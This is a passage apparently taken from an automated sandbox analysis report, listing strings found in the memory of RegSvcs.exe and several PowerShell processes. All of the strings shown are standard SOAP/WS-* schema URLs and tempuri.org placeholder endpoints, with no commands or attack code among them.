Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1694419298.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1717816114.0000000004F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1750061142.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789776531.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: powershell.exe, 00000004.00000002.1694419298.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1717816114.00000000050E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1750061142.0000000004516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1789776531.0000000004C36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.00000000029BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
